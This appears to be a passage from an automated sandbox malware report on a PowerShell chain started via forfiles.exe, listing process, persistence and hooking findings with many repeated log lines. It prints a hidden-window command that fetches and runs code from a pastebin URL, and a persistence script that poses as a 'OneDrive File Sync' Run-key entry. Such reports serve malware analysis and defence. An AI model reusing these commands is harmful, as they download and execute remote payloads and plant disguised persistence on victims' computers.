Source: Binary string: softy.pdbdlll source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1873629350.000001D4FB250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089$ source: powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbvice source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CRYPT_DEBUG_FORCE_FREE_LIBRARY.pdb! source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4B0600BD pushad ; iretd 0_2_00007FFB4B0600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4B06812B push ebx; ret 0_2_00007FFB4B06816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB4B1103CA pushad ; retf 7_2_00007FFB4B1103CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB4B1159EE push ds; retf 7_2_00007FFB4B115A0F

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (...)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (...)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
